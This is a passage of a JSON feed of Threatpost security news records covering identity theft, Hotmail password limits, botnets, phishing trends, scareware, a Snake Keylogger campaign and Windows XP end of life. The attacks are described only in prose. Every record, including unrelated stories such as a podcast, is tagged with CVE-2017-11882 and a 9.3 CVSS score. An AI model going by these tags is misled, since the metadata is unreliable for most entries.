authorities, Price had actually been away from the army since June 2010 and wanted as a deserter.\n\nAllen, who helped found Microsoft with Bill Gates in 1975, also owns the NBA\u2019s Portland Trailblazers and the NFL\u2019s Seattle Seahawks and has a net worth of about $14.2 billion, [according to Forbes](<http://www.forbes.com/profile/paul-allen/>) \u2013 enough to rank at number 48 on the [publication\u2019s list](<http://www.forbes.com/billionaires/#p_1_s_a0_All%20industries_All%20countries_All%20states_>) of the richest people on the planet.\n\nFor more on this, check out the AP report via the [Washington Post](<http://www.washingtonpost.com/business/fbi-awol-pa-soldier-obtained-microsoft-co-founder-debit-card-by-changing-account-address/2012/03/27/gIQAUqoodS_story.html>).\n", "cvss3": {}, "published": "2012-03-29T15:56:05", "type": "threatpost", "title": "Fortune Favors the Bold? Man Steals Microsoft Founder's Identity, Credit Card", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:32:32", "id": "THREATPOST:51AB3DBBFBFCA1EDCCB83FCECB47C07B", "href": "https://threatpost.com/fortune-favors-bold-man-steals-microsoft-founder-s-identity-credit-card-032912/76380/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:02:13", "description": "[![Hotmail](https://media.threatpost.com/wp-content/uploads/sites/103/2013/04/07072818/hotmailpasswords.jpg)](<https://threatpost.com/hotmail-limits-passwords-16-characters-092112/>)Passwords, unfortunately, still are the main authentication mechanism on most Web sites, including all of the popular webmail services, such as Hotmail, Gmail and Yahoo Mail. Many sites encourage users to pick complex and long passwords, so it\u2019s surprising to see that Microsoft now has limited Hotmail passwords to no more than 16 characters. Even more surprising, however, is that Hotmail will accept the first 16 characters of an existing, longer password, indicating that the company may have been storing users\u2019 passwords in plaintext.\n\nMicrosoft officials say that there has been a 16-character limit for Hotmail accounts for some time. But security researchers who looked at the requirement found it odd, to say the least. Sixteen characters is a somewhat arbitrary limit, but the more interesting bit is why Microsoft chose to make the change at all.\n\nThe real question, however, is what the implications of the change are. As [Costin Raiu](<https://www.securelist.com/en/blog/208193844/Hotmail_Your_password_was_too_long_so_we_fixed_it_for_you>), head of Kaspersky Lab\u2019s GReAT research team, wrote in an analysis of the issue, one possibility is that Microsoft has been truncating longer passwords to 16 characters all along and then hashing those first 16 characters. The other possibility is somewhat more troubling.\n\n\u201cMy previous password has been around 30 chars in size and now, it doesn\u2019t work anymore. However, I could login by typing just the first 16 chars,\u201d he wrote.\n\n\u201cTo pull this trick with older passwords, Microsoft had two choices:\n\n* store full plaintext passwords in their db; compare the first 16 chars only \n* calculate the hash only on the first 16; ignore the rest\n\nStoring plaintext passwords for online services is a definite no-no in security. The other choice could mean that since its inception, Hotmail was silently using only the first 16 chars of the password. To be honest, I\u2019m not sure which one is worse.\u201d\n\nMicrosoft officials did not respond to questions on this issue.\n\nIn order to keep passwords safe from snooping, many Web sites run users\u2019 plaintext passwords through a hash function, which obscures them. Depending upon which hash function is being used, and what kind of computers is used to do the cracking, the length of time needed to crack a password hash can vary greatly. \n\n\u201cPlease note our research has shown uniqueness is more important than length and (like all major account systems) we see criminals attempt to victimize our customers in various ways; however, while we agree that in general longer is better, we\u2019ve found the vast majority of attacks are through phishing, malware infected machines and the reuse of passwords on third-party sites \u2013 none of which are helped by very long passwords,\u201d a Microsoft spokesman said. \n\n\u201cSixteen characters has been the limit for years now. We will always prioritize the protection needs of users\u2019 accounts and we will continue to monitor the new ways hijackers and spammers attempt to compromise accounts, and we design innovative features based on this. At this time, we encourage customers to frequently reset their Microsoft account passwords and use unique passwords that are different from other services.\u201d\n\n_This story was updated on Sept. 24 to add a comment from Microsoft. _\n", "cvss3": {}, "published": "2012-09-21T17:59:05", "type": "threatpost", "title": "Hotmail Limits Passwords to 16 Characters", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:31:29", "id": "THREATPOST:80110ABE631D4720D6EECA161FFCE965", "href": "https://threatpost.com/hotmail-limits-passwords-16-characters-092112/77038/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:06:49", "description": "[![](https://media.threatpost.com/wp-content/uploads/sites/103/2013/04/07060134/us_botnets.jpg)](<https://threatpost.com/us-reigns-most-bot-infected-country-101310/>)The U.S. has by far the highest number of bot-infected computers of any country in the world, with nearly four times as many infected PCs as the country in second place, Brazil, according to a new report by Microsoft. The quarterly report on malicious software and Internet attacks shows that while some of the major botnets have been curtailed in recent months, the networks of infected PCs still represent a huge threat.\n\nThe data on botnets, published in [Microsoft\u2019s Security Intelligence Report](<https://www.microsoft.com/security/sir/default.aspx>) for the first half of 2010, paints a somewhat bleak picture of the botnet landscape. Between January and June of this year, Microsoft cleaned more than 6.5 million machines worldwide of bot infections, which represents a 100 percent increase in bot infections from the same period in 2009. This increase comes at a time when there is more attention than ever focused on the botnet problem, both by security researchers and law-enforcement agencies around the world.\n\nMicrosoft measures botnet infections by counting the number of machines \nthat are cleaned of bots by using the company\u2019s Malicious Software \nRemoval Tool. The Microsoft data obviously does not show a complete picture of bot infections across the entire Internet, but gives a snapshot of the infection problem on the machines the company monitors.\n\nIn the last year or so, several major spam botnets have been either completely crippled or in some way damaged by takedown efforts that target the command and control servers that run the botnets. Pushdo and Waledac are the two most prominent examples of this effort, and Microsoft officials were deeply involved in the [takedown of Waledac](<https://threatpost.com/waledac-botnet-now-completely-crippled-experts-say-031610/>), eventually going to court in September to get legal ownership of hundreds of IP addresses used by the botnet.\n\nThe company worked with researchers in Germany and Austria, as well as law-enforcement agencies, to gain control of the Waledac C&C servers. However, while the takedown was something of a coup, Waledac was not the top spam botnet and Microsoft\u2019s data shows that there are still a number of large botnets, many of which are far less well-known than Waledac, Pushdo and Zeus, that are wreaking havoc online.\n\nThe most commonly detected bot client in the new SIR is Rimecud, the main piece of malware that is responsible for the Mariposa botnet. In the first half of 2010, Microsoft cleaned more than 3.5 million PCs infected with Rimecud. Some of the more famous botnets, including Rustock, Nuwar and Zbot are pretty far down the list of the most active botnets.\n\n\u201cRimecud is a \u2018kit\u2019 family: different people working independently use a malware creation \nkit to create their own Rimecud botnets. Rimecud is the primary malware family behind the \nso-called Mariposa botnet, which infected millions of computers around the world in 2009 and 2010. In July of 2010, the Slovenian Criminal Police arrested a 23-year-old Slovenian citizen suspected of writing the malware code, following the February 2010 arrests of three suspected Mariposa botnet operators by the Spanish Guardia Civil,\u201d Microsoft said in the report. \u201cRimecud is a backdoor worm that spreads via fixed and removable drives, and by sending malicious hyperlinks to a victim\u2019s contacts via several popular instant messaging programs. Rimecud can be commanded to take a number of typical botnet actions, including spreading itself via removable drives, downloading and executing additional malware, and stealing passwords.\u201d\n\nRimecud is unlike many other botnets as it has its own network protocol, based on UDP, that it uses for communications between the bots and the C&C servers. A number of other botnets use modified, or somewhat customized, protocols for communication, making it more difficult for researchers to analyze the botnet\u2019s behavior. The attackers behind these botnets have become increasingly intelligent and sophisticated in recent years, and they have learned from their past mistakes, as well as the actions of researchers and law-enforcement agencies. \n\nOne of the key methods attackers have adopted to make life more difficult for researchers is to not use off-the-shelf bot software, but instead buy kits that can create custom bots.\n\n\u201cThese kits are collections of tools, sold and shared within the malware underground, that enable aspiring bot-herders to assemble their own botnet by creating and spreading customized malware variants. Several malware kits are freely available for downloading and sharing; some have been published as open source code, which enables malware developers to create modified versions of the kits.3 Other kits are developed by individual groups and sold like \nlegitimate commercial software products, sometimes even including support agreements,\u201d Microsoft said in the report. \n", "cvss3": {}, "published": "2010-10-13T16:07:04", "type": "threatpost", "title": "U.S. Reigns As Most Bot-Infected Country", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T10:20:36", "id": "THREATPOST:49045E816279C72FD35E91BF5F87387C", "href": "https://threatpost.com/us-reigns-most-bot-infected-country-101310/74570/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:07:55", "description": "[![](https://media.threatpost.com/wp-content/uploads/sites/103/2013/04/07055402/sharepoint_xss.jpg)](<https://threatpost.com/new-flaw-found-microsoft-sharepoint-042910/>)There is a [cross-site scripting flaw in SharePoint 2007](<http://www.htbridge.ch/advisory/xss_in_microsoft_sharepoint_server_2007.html>), Microsoft\u2019s collaboration product, which could give an attacker the ability to execute arbitrary JavaScript code on a machine through a browser. \n\nHigh-Tech Bridge, a Swiss security firm, published an advisory about the vulnerability on Thursday, along with proof-of-concept code to demonstrate the exploit. \n\n\u201cThe vulnerability exists due to failure in the \u201c/_layouts/help.aspx\u201d \nscript to properly sanitize user-supplied input in \u201ccid0\u2033 variable. \nSuccessful exploitation of this vulnerability could result in a \ncompromise of the application, theft of cookie-based authentication \ncredentials, disclosure or modification of sensitive data,\u201d the company said in its advisory.\n\nMicrosoft\u2019s Security Response Center said it is working on mitigations, workarounds and a fix for the vulnerability. \n", "cvss3": {}, "published": "2010-04-29T17:12:54", "type": "threatpost", "title": "New Flaw Found in Microsoft SharePoint", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T12:53:17", "id": "THREATPOST:5170E663982119D9A7AA4064EC71D01D", "href": "https://threatpost.com/new-flaw-found-microsoft-sharepoint-042910/73898/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-11-03T07:10:35", "description": "Phishing attempts more than doubled in 2018, as bad actors sought to trick victims into handing over their credentials. They used both old tricks \u2013 such as scams tied to current events \u2013 as well as other stealthy, fresher tactics.\n\nResearchers with Kaspersky Lab said in a [Tuesday report](<https://securelist.com/spam-and-phishing-in-2018/89701/>) that during the course of 2018, they detected phishing redirection attempts 482.5 million times \u2013 up from the 246.2 million attempts detected in 2017. In total, 18.32 percent of users were attacked, researchers said.\n\n\u201cWe have seen a steady increase in phishing attacks on cryptocurrency-related resources, and expect new scams to appear in 2019,\u201d according to the report, by Maria Vergelis, Tatyana Shcherbakova and Tatyana Sidorina with Kaspersky Lab. \u201cDespite the fall in value and the lean times for the cryptocurrency market as a whole, phishers and spammers will try to squeeze everything they can out of this.\u201d\n\n## Current Events: A Go-To Phishing Hook\n\nBad actors continued to rely on an age-old trick in 2018 for phishing attacks: Using newsworthy events, such as new smartphone launches, [sales seasons](<https://threatpost.com/threatlist-gift-card-themed-bec-holiday-scams-spike/139716/>), [tax deadlines](<https://threatpost.com/fbi-warns-of-spike-in-w-2-phishing-campaigns/130057/>), and the EU General Data Protection Regulation (GDPR) to hook the victim.\n\n[![Phishing report Kaspersky Lab](https://media.threatpost.com/wp-content/uploads/sites/103/2019/03/12151936/190311-spam-report-2018-1-300x143.png)](<https://media.threatpost.com/wp-content/uploads/sites/103/2019/03/12151936/190311-spam-report-2018-1-e1552418397221.png>)\n\nClick to Expand.\n\nPhishing emails purporting to be about GDPR, for instance, boomed [in the first few months](<https://threatpost.com/gdpr-phishing-scam-targets-apple-accounts-financial-data/131915/>) of 2018, because during those months there was an upturn in legitimate GDPR mailings warning users of the transition to the new policies, which require stringent processes to store and process personal data of European citizens.\n\nAttackers unsurprisingly took advantage of this with their own GDPR-related emails: \u201cIt was generally B2B spam \u2014 mostly invitations to paid seminars, webinars, and workshops promising to explain the ins and outs of the new regulation and its ramifications for business,\u201d said researchers.\n\nOther top events, such as the 2018 [FIFA World Cup](<https://threatpost.com/world-cup-vacation-scams-lead-in-phishing-trips-this-summer/132543/>) and the launch of the new iPhone sparked phishing attempts, including emails leading to fake FIFA partner websites for the former, and spam messages purporting to sell accessories and replica gadgets for the latter.\n\n## Cryptocurrency Targets\n\nDespite the cryptocurrency market\u2019s [struggle in 2018](<https://www.cnbc.com/2018/10/12/bitcoin-price-cryptocurrency-market-drops-as-xrp-ethereum-plunge.html>), bad actors\u2019 interest in cryptocurrencies appears far from waning. In fact, scammers utilized a number of methods to capitalize on victims\u2019 interests in the cryptocurrency market, such as posing as a cryptocurrency exchange or fake Initial Coin Offering (ICO) bent on convincing victims into transferring money to cryptocurrency wallets.\n\n\u201cIn 2018, our Anti-Phishing system prevented 410,786 attempts to redirect users to phishing sites imitating popular cryptocurrency wallets, exchanges and platforms,\u201d researchers said. \u201cFraudsters are actively creating fake login pages for cryptocurrency services in the hope of getting user credentials.\u201d\n\n[![Spam and phishing attack report](https://media.threatpost.com/wp-content/uploads/sites/103/2019/03/12152522/190311-spam-report-2018-7-300x258.png)](<https://media.threatpost.com/wp-content/uploads/sites/103/2019/03/12152522/190311-spam-report-2018-7.png>)\n\nClick to Expand.\n\nWhen it came to ICOs, scammers extended invitations to victims for investing in various ICOs via email and social-media posts.\n\nOne such scam targeted a cryptocurrency called buzcoin; the scammers got ahold of the project mailing list and sent fake presale invitations to subscribers before the ICO began \u2013 eventually making away with $15,000, according to Kaspersky Lab.\n\nThere were also sextortion scams that coerced victims to send cryptocurrency in exchange for keeping quiet about their private online activities, with one campaign in July noted for using victims\u2019 [legitimate password](<https://threatpost.com/sextortionists-shift-scare-tactics-to-include-legit-passwords/133960/>) in the email as a scare tactic; and another one in December hit victims with [ransomware](<https://threatpost.com/sextortion-emails-force-payment-via-gandcrab-ransomware/139753/>).\n\nResearchers said they don\u2019t expect attackers\u2019 interests in cryptocurrency to die down any time soon: \u201cIn 2019, spammers will continue to exploit the cryptocurrency topic,\u201d they said. \u201cWe expect to see more fraudulent mailings aimed at both extracting cryptocurrency and gaining access to personal accounts with various cryptocurrency services.\u201d\n\n## Other Tricks\n\nIn 2018, the number of malicious messages in spam was 1.2 times less than in 2017, according to researchers. Of those malicious messages, the most widely distributed malicious objects in email ([Exploit.Win32, CVE-2017-11882](<https://threatpost.com/threatlist-microsoft-macros-remain-top-vector-for-malware-delivery/137428/>)), exploited a patched Microsoft vulnerability that allowed the attacker to perform arbitrary code-execution.\n\n[![spam phishing email attack report ](https://media.threatpost.com/wp-content/uploads/sites/103/2019/03/12152819/malware-phishing-300x191.png)](<https://media.threatpost.com/wp-content/uploads/sites/103/2019/03/12152819/malware-phishing.png>)\n\nClick to Expand.\n\nDespite this downturn in malicious emails, scammers appear to be looking to other sneaky tactics to avoid detection and still make off with victims\u2019 credentials \u2014 in particular using non-typical formats for spam like ISO, IQY, PIF and PUB attachments.\n\n\u201c2018 saw a continuation of the trend for attention to detail in email presentation,\u201d researchers said. \u201cCybercriminals imitated actual business correspondence using the companies\u2019 real details, including signatures and logos.\u201d\n\nIn addition, bad actors appeared to transition to new channels of content distribution beyond email \u2013 including social media sites, services like [Spotify](<https://threatpost.com/spotify-phishers-hijack-music-fans-accounts/139329/>), or even [Google Translate](<https://threatpost.com/clever-phishing-attack-enlists-google-translate-to-spoof-facebook-login-page/141571/>).\n\n\u201cCybercriminals in 2018 used new methods of communication with their \u2018audience,\u2019 including instant messengers and social networks, releasing wave after wave of self-propagating malicious messages,\u201d said researchers. \u201cHand-in-hand with this, as illustrated by [an] attack on universities, fraudsters are seeking not only new channels, but new targets as well.\u201d\n", "cvss3": {}, "published": "2019-03-12T20:48:20", "type": "threatpost", "title": "ThreatList: Phishing Attacks Doubled in 2018", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2019-03-12T20:48:20", "id": "THREATPOST:0A40F95A480060B254A1AA6FCF9504B2", "href": "https://threatpost.com/threatlist-phishing-attacks-doubled-in-2018/142732/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-10-06T23:06:15", "description": "[![AVG](https://media.threatpost.com/wp-content/uploads/sites/103/2013/04/07060531/avg.jpg)](<https://threatpost.com/fake-avg-scam-software-cops-name-and-logo-real-av-020111/>)We\u2019ve noted for a while that the \npractices of rogue antivirus software have started to mimic those of \nlegitimate antivirus software vendors. But a new version of FakeXPA scareware take things a bit further: posing as a legitimate commercial AV package, AVG Antivirus 2011. \n\nMicrosoft\u2019s Malware Protection Center [issued a warning for the phony AVG program on Monday](<http://www.microsoft.com/security/portal/Threat/Encyclopedia/Entry.aspx?Name=AVGAntivirus2011>), noting that the application is standard issue scareware that claims to scan for malware, displays fake \u2018detection\u2019 warnings about infections, then asks for money to remove the non-existent malware. Like other scareware, FakeXPA is known, in cases, to install its own malware \u2013 variants of the Alureon Trojan horse program.\n\nScreen shots of the FakeXPA malware \nshows a legitimate seeming GUI with the AVG Anti Virus logo prominently \ndisplayed. AVG Antivirus 2011 is one of many names used by the malware, with small variations in branding and user interface distinguishing each.\n\nRogue \nanti virus has blossomed into a multi million dollar business in the \nlast decade using aggressive promotion techniques like search engine \noptimization and web-based pop-up ads to trick unwitting Web surfers \ninto downloading their scareware.\n\n![](https://media.threatpost.com/wp-content/uploads/sites/103/2013/04/07060527/FakeAVG_0.jpg) \n\n\nCoopting a legitimate product\u2019s name and logo are just the latest in a series of steps by rogue anti malware vendors to mirror the features and actions of legitimate anti virus software makers. In addition, fake AV firms have also introduced services like localization, [online customer support](<https://threatpost.com/pulling-back-curtain-rogue-av-tech-support-071210/>) (with real humans!) and even [AV-Test like product benchmarking](<https://threatpost.com/rise-rogue-av-testers-070910/>) to serve their \u201ccustomers\u201d and increase profits. \n", "cvss3": {}, "published": "2011-02-01T20:37:43", "type": "threatpost", "title": "Fake AVG: Scam Software Cops Name and Logo of Real AV", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:35:15", "id": "THREATPOST:DF54323828EEC1DDCE4B2312AC6F085F", "href": "https://threatpost.com/fake-avg-scam-software-cops-name-and-logo-real-av-020111/74899/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2022-05-23T13:53:38", "description": "While most malicious e-mail campaigns use Word documents to hide and spread malware, a recently discovered campaign uses a malicious PDF file and a 22-year-old Office bug to propagate the Snake Keylogger malware, researchers have found.\n\nThe campaign\u2014discovered by researchers at HP Wolf Security\u2014aims to dupe victims with an attached PDF file purporting to have information about a remittance payment, according to [a blog post](<https://threatresearch.ext.hp.com/pdf-malware-is-not-yet-dead/>) published Friday. Instead, it loads the info-stealing malware, using some tricky evasion tactics to avoid detection.\n\n\u201cThe reasons are clear: users are familiar with these file types, the applications used to open them are ubiquitous, and they are suited to social engineering lures,\u201d he wrote.\n\nStill, while the new campaign does use PDF in the file lure, it later employs Microsoft Word to deliver the ultimate payload\u2014the Snake Keylogger, researchers found. Snake Keylogger is a malware developed using .NET that first appeared in late 2020 and is aimed at stealing sensitive information from a victim\u2019s device, including saved credentials, the victim\u2019s keystrokes, screenshots of the victim\u2019s screen, and clipboard data, [according to Fortinet.](<https://www.fortinet.com/blog/threat-research/deep-dive-into-a-fresh-variant-of-snake-keylogger-malware>)\n\n## **\u2018Unusual\u2019 Campaign**\n\nThe HPW Wolf Security team noticed a new PDF-based threat campaign on March 23 with an \u201cunusual infection chain,\u201d involving not just a PDF but also \u201cseveral tricks to evade detection, such as embedding malicious files, loading remotely-hosted exploits and shellcode encryption,\u201d Schlapfer wrote.\n\nAttackers target victims with emails that include a PDF document named \u201cREMMITANCE INVOICE.pdf\u201d\u2014misspelling intended\u2013as attachment. If someone opens the file, Adobe Reader prompts the user to open a .docx file with a rather curious name, researchers found.\n\n\u201cThe attackers sneakily named the Word document \u201chas been verified. However PDF, Jpeg, xlsx, .docx\u201d to make it look as though the file name was part of the Adobe Reader prompt,\u201d according to the post.\n\nThe.docx file is stored as an EmbeddedFile object within the PDF, which opens Microsoft Word if clicked on, researchers found. If Protected View is disabled, Word downloads a Rich Text Format (.rtf) file from a web server, which then is run in the context of the open document.\n\nResearchers unzipped the contents of the .rtf\u2014which is an Office Open XML file\u2014finding a URL hidden in the \u201c_document.xml.rels__\u201d _file that is not a legitimate domain found in Office documents, they said.\n\n## **17-Year-Old Bug Exploited**\n\nConnecting to this URL leads to a redirect and then downloads an RTF document called \u201c_f_document_shp.do__c._ This document contained two \u201cnot well-formed\u201d OLE objects that revealed shellcode exploiting [CVE-2017-11882](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2017-11882>), which researchers said is an \u201cover four-years-old\u201d remote code execution vulnerability (RCE) in Equation Editor.\n\nEquation Editor is app installed by default with the Office suite that\u2019s used to insert and edit complex equations as Object Linking and Embedding (OLE) items in Microsoft Word documents.\n\nIt turns out, however, that the bug that attackers leverage in the campaign is actually one that Microsoft patched more than four years ago\u2013[in 2017](<https://threatpost.com/microsoft-patches-17-year-old-office-bug/128904/>), to be exact\u2014but actually had existed some 17 years before that, making it 22 years old now.\n\nAs the final act of the attack, researchers found shellcode stored in the \u201c_OLENativeStream__\u201d _structure at the end of one of the OLE objects they examined. The code eventually decrypts a ciphertext that turns out to be more shellcode, which is then executed after to lead to an executable called _fresh.exe_ that loads the Snake Keylogger, researchers found.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-05-23T12:07:56", "type": "threatpost", "title": "Snake Keylogger Spreads Through Malicious PDFs", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11882"], "modified": "2022-05-23T12:07:56", "id": "THREATPOST:384A1D8040B61120BE2BA529493B9871", "href": "https://threatpost.com/snake-keylogger-pdfs/179703/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-10-06T23:05:59", "description": "**[![Katie Moussouris](https://media.threatpost.com/wp-content/uploads/sites/103/2013/04/07060714/katie_moussouris2.jpg)](<https://threatpost.com/katie-moussouris-microsoft-trustworthy-computing-and-evolution-security-community-031611/>)**\n\nDennis Fisher talks with Microsoft\u2019s Katie Moussouris about the way that the Trustworthy Computing effort at Microsoft has changed, how the security community has evolved since she got involved in the 1990s and the challenges\u2013and fun\u2013of being a woman in security.\n\n*Podcast audio courtesy of [sykboy65](<http://www.youtube.com/watch?v=Z8fMm3sm_ww&feature=channel_page>)\n\nSubscribe to the Digital Underground podcast on [![](https://media.threatpost.com/wp-content/uploads/sites/103/2013/04/07060713/itunes_button341.jpg)](<http://itunes.apple.com/WebObjects/MZStore.woa/wa/viewPodcast?id=315355232>)\n", "cvss3": {}, "published": "2011-03-16T15:12:29", "type": "threatpost", "title": "Katie Moussouris on Microsoft, Trustworthy Computing and the Evolution of the Security Community", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-07-24T18:59:56", "id": "THREATPOST:D6D859A31F73B00E9B6F642D4C89B344", "href": "https://threatpost.com/katie-moussouris-microsoft-trustworthy-computing-and-evolution-security-community-031611/75032/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:59:04", "description": "Windows XP security support ends Tuesday and until now, most of the public hand-wringing over XP\u2019s end-of-life has been about the potential for malware outbreaks against unpatched vulnerabilities that have been [stockpiled by hackers](<http://threatpost.com/windows-xp-end-of-life-breeding-equal-parts-fud-legit-concerns/105252>) anxiously awaiting April 8, 2014.\n\nBut what about vulnerabilities in XP that have been responsibly shared with Microsoft and won\u2019t be fixed? Those too are perpetual zero-days after Tuesday.\n\nMicrosoft has made huge strides in developing trusted relationships with security researchers who are actively submitting bugs to Microsoft across its product lines. For Microsoft\u2019s part, it has done outreach to researchers, clarified disclosure policies and processes and established [bounty programs for bypasses of innate Windows mitigations](<http://threatpost.com/microsofts-bug-bounty-program-and-the-law-of-unintended-consequences/101038>).\n\nAnd Microsoft isn\u2019t to be faulted for its business decision made long ago to end extended support for XP that includes security patches. Yet the fact remains whatever XP systems remain in circulation after tomorrow will be exposed and that brings up questions, such as: How will white or gray hats respond? For example, will there be a firestorm of public disclosures in the coming weeks?\n\n\u201cI know a subset of people who have disclosed stuff [in XP] to Microsoft that has not been patched, and that\u2019s given what I know. I\u2019m sure there\u2019s more I don\u2019t know of,\u201d said Ross Barrett, senior manager of security engineering at Rapid7. \u201cI wouldn\u2019t encourage researchers to publically disclose their researche because they think that might make Microsoft issue a patch, because that\u2019s not going to happen. The only result is that it would increase the exposure for people at large.\n\n\u201cIt\u2019s a muddy bit of water,\u201d Barrett said. \u201cMicrosoft has been good about dealing with researchers who have been doing the right thing by following responsible disclosure procedures, but now they\u2019re not seeing action.\u201d\n\nMicrosoft did not respond to a request for comment in time for publication.\n\nHP\u2019s Zero Day Initiative, which buys vulnerabilities and exploits from researchers and shares them first with customers and then the affected vendor, has [203 advisories pending public disclosure](<http://www.zerodayinitiative.com/advisories/upcoming/>) listed on its website, 54 of which are Microsoft vulnerabilities going back a year. The website doesn\u2019t list the specific Microsoft product affected, but Microsoft has more than any other major vendor on the list.\n\n\u201cI\u2019m sure there\u2019s tons of stuff still out there; some of it is design flaw stuff that Microsoft can\u2019t fix or never got around to it,\u201d Barrett said. \u201cI\u2019m sure there\u2019s a backlog of stuff, but the clock has run out on XP.\u201d\n\nMicrosoft has already announced its final XP patch, a fix for a zero-day in Word that will be available Tuesday (Office 2003 support also ends Tuesday). The fear among some experts is that hackers will look at Microsoft security bulletins for vulnerabilities in supported products and trace those back to their potential exploitability in XP.\n\n\u201cAbsolutely hackers do that,\u201d Barrett said. \u201cIf you\u2019ve got a vulnerability in this file, they\u2019ll track it back to a particular DLL and see that it\u2019s been part of the OS since 2002 and not updated since 2004, they\u2019ll know it\u2019s vulnerable.\n\n\u201cYou might see a golden age of XP vulnerabilities for the next four to six months when adoption of XP is still relatively high and countermeasures are no longer in place. Then you\u2019ll start to see it fade as it\u2019s less used.\u201d\n\nQualys CTO Wolfgang Kandek has been tracking XP use in certain industries through the company\u2019s vulnerability scanner. Financial institutions still have the highest use of XP at 21 percent, followed by transportation at 14 percent (though this has dropped from 55 percent 12 months ago). Retail, another industry run ragged by hackers, is also at 14 percent. Support for Windows XP Embedded, which runs inside a number of consumer and commercial devices in these industries, does not run out until Jan. 12, 2016.\n\n\u201cThis is an additional weakness for these (retail) systems,\u201d Kandek said. \u201cThere are already problems with remote management, default passwords that work everywhere, a bunch of things that were done to make management easier that were not configured well. This just adds to it.\u201d\n\nKandek said that roughly 70 percent of vulnerabilities that were patched in 2013 were found in Windows 8 through XP.\n\n\u201cI don\u2019t see why that would stop in May, June or July. Attackers can use that knowledge as pointer into XP to find if a vulnerability exists. It\u2019s an accelerator for them. My feeling is that after two or three months, there will be tools in public that reliably exploit XP. I can definitely see how that would make an attacker\u2019s work much easier.\u201d\n", "cvss3": {}, "published": "2014-04-08T06:03:54", "type": "threatpost", "title": "Unpatched Bugs, Windows XP End of Life and Public Disclosure", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-04-08T00:08:09", "id": "THREATPOST:B051AFA0F0705404F1CD22704980AE7F", "href": "https://threatpost.com/the-muddy-waters-of-xp-end-of-life-and-public-disclosures/105295/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:09:09", "description": "[![](https://media.threatpost.com/wp-content/uploads/sites/103/2013/04/07054449/ie7_flaw.jpg)](<https://threatpost.com/new-zero-day-flaw-discovered-ie7-112209/>)There is a newly discovered vulnerability in both Internet Explorer 6 and Internet Explorer 7 that could enable an attacker to take complete control of a vulnerable machine.\n\nThe vulnerability is the result of a dangling pointer in IE and there is a working exploit for the flaw circulating online. The flaw lies in the way that Internet Explorer handles CSS data. [CSS](<http://www.w3.org/Style/CSS/>) is a technology that\u2019s used in many sites to help present information in an organized manner. Specifically, the vulnerability is in the mshtml.dll, the Microsoft HTML Viewer.\n\nAccording to an [analysis by Vupen Security](<http://www.vupen.com/english/advisories/2009/3301>), an attacker could exploit the flaw either to crash a vulnerable version of IE, or to run arbitrary code on the user\u2019s machine. There is no patch available for the vulnerability. The SANS Internet Storm Center also has an analysis up.\n\nA vulnerability has been identified in Microsoft Internet Explorer, \nwhich could be exploited by attackers to compromise a vulnerable \nsystem. This issue is caused by a dangling pointer in the Microsoft \nHTML Viewer (mshtml.dll) when retrieving certain CSS/STYLE objects via \nthe \u201cgetElementsByTagName()\u201d method, which could allow attackers to \ncrash an affected browser or execute arbitrary code by tricking a user \ninto visiting a malicious web page.\n\nAn [exploit for the vulnerability in IE](<http://www.securityfocus.com/archive/1/507984/30/0/threaded>) was published on the Bugtraq mailing list Friday, but experts say it is not very reliable at this point. However, the level of detail included in the Bugtraq post will likely 